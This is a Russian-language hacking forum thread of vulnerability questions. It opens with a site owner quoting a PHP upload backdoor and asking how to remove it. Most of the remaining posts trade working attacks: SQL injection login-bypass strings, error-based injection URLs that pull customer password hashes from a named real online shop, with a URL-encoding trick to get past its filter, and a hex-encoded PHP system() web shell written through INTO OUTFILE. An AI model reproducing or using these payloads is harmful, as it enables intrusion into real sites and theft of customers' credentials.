Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ghost1k

    ghost1k New Member

    Joined:
    4 Mar 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    дыра на сервере / сайте

    В общем какая-то зараза залезла на сервер.
    Создает переодически(?) различные файлы типа class.php / main.php / и другие интересные названия. Раньше еще редиректы прописывало в .htaccess, но это я поправил изменением прав (такая вот заплатка). А еще оно делает файл с вот таким содержимым:
    PHP:
    <?
    if (
    $_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); Exit;}
      if (
    $_FILES['F1l3']) {
        
    move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']);
        echo 
    'OK';
      } else {
        echo 
    'You are forbidden!';
      }
    ?>

    Искал и айболитом и с помощью:
    find ./ -name '*.php' | xargs grep -E '[0-9a-zA-Z/]{80}' > viruses.txt

    что-то находил, что-то удалял, но пока не помогло.
    чего еще сотворить? эта зараза лезет не в конкретную cms, хотя я раньше думал, что так. На данный момент создает эти файлы тупо в корне сайта. До этого они проявлялись в самых далеких местах, после вчерашней чистки пока только в корне.
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    посмотрите даты изменения файлов, бэкдоры вида <? eval($_GET[q]); ?>, конфигурацию всего сервера (устаревшая? вомзожно стоит накатить секурные апдейты?), если cms, тоже обновить. также изучайте логи и смотрите, куда имеено залились. ну и конечно, советую обратиться к спецалисту, например вот
     
    _________________________
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,399
    Likes Received:
    883
    Reputations:
    859
    Сколько у вас сайтов на одном аккаунте? если несколько то их все разом чистить надо, но читска, как токовой не устронит проблему, нужно искать ее корень и проводить профилактические меры по предотвращению подобных ситуаций!
     
    _________________________
  4. ghost1k

    ghost1k New Member

    Joined:
    4 Mar 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    ответил в ЛС
     
  5. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,531
    Likes Received:
    166
    Reputations:
    99
    чем же можно зашифровать данные поступающие в базу ?
    кроме пароля открытые остаются email - они же логины, телефоны, номера карт например
    и нужно что бы эти данные из базы могла расшифровать только функция в скрипте принимающая и обрабатывающая данные. данные хранятся в шифрованом виде
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    например mcrypt .
     
    _________________________
    1 person likes this.
  7. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,531
    Likes Received:
    166
    Reputations:
    99
    возможно ли зашифровать передачу скрытого ssid для wifi точки, что бы его нельзя было перехватить ? шифрование точки: WPA-PSK/WPA2-PSK
    зашифровать так же как и пароль wifi точки !
     
  8. Han

    Han New Member

    Joined:
    2 Mar 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Создаю пост запрос:
    login=Admin'+--+\&pass=123
    Слэш вызывает ошибку:
    WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1

    Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?

    P.S.
    Пробовал.(
     
    #23608 Han, 4 Nov 2014
    Last edited: 4 Nov 2014
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    885
    Likes Received:
    117
    Reputations:
    25
    # например еще
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    пробовали с комбинацией OR? http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html
     
    _________________________
  11. Han

    Han New Member

    Joined:
    2 Mar 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
  12. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    825
    Likes Received:
    287
    Reputations:
    359

    Code:
    login=Admin'+or+login+='[B]bad_login_name[/B]&pass=[B]any[/B]
    bad_login_name - любой логин кроме необходимого, к которому не подходит пасс any
     
    _________________________
  13. Han

    Han New Member

    Joined:
    2 Mar 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Не помогло.
    В исходном коде введенные мною кавычки выглядят как & # 039; только без пробела. Это играет роль?
     
    #23613 Han, 5 Nov 2014
    Last edited: 5 Nov 2014
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    кавычки не экранируются и не фильтруются. попробуйте
    Code:
    SELECT * FROM users WHERE `login` = 'Admin' AND `password` = '1' OR '1'='1' --
    это равносильно запросу
    Code:
    SELECT * FROM users WHERE login='Admin' AND TRUE
    поэтому будет выборка из таблицы, где значение колонки login == Admin.
     
    _________________________
  15. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    825
    Likes Received:
    287
    Reputations:
    359
    да, это фильтрация.... там походу только слеш не фильтруется :mad:
     
    _________________________
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    885
    Likes Received:
    117
    Reputations:
    25
    Есть Error based Injection.
    Нужные данные находятся в соседней бд, при запросе "select pass from users" все выводит норм, при запросе "select table_name from+information_schema.tables" - все норм
    Но когда пытаешься вытащить данные(таблицы и колонки вытягивает норм) с соседней бд срабатывает защита: "select pass2 from нужнаяБД.users". Примечательно, но и когда выполняешь запрос типа "select pass from БДвкоторойсижу.users" так же срабатывает защита. Подумал бы что дело в "." между бд и ьаблицей, но с information_schema вытягивает ведь. Застопорился, что можно попробовать? :)

    норм
    HTML:
    _http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+customers+limit+0,1))))=1
    ошибка
    HTML:
    http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+formaggiodb_osc.customers+limit+0,1))))=1
     
    #23616 Br@!ns, 6 Nov 2014
    Last edited by a moderator: 7 Nov 2014
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    действительно фильтр на имя бд. помогло урл кодирование:
    Code:
    http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+forma%67%67iodb_osc.customers+limit+0,1))))=1
    где %6767 = gg, то есть имя бд formaggiodb_osc :)
     
    _________________________
    1 person likes this.
  18. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы.
    делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' --
    Файл не заливается.
    По ходу дела фильтрация на кавычки. Как обойти и залить шелл?
     
  19. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    600
    Likes Received:
    350
    Reputations:
    652
    /showpost.php?p=663815&postcount=39
    /threadnav34338-1-10.html

    соответственно, mg=on и mq=off
     
  20. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    885
    Likes Received:
    117
    Reputations:
    25
    Чем можно вытянуть данные через Blind SQL inj в post запросе, на https протоколе?
     
Thread Status:
Not open for further replies.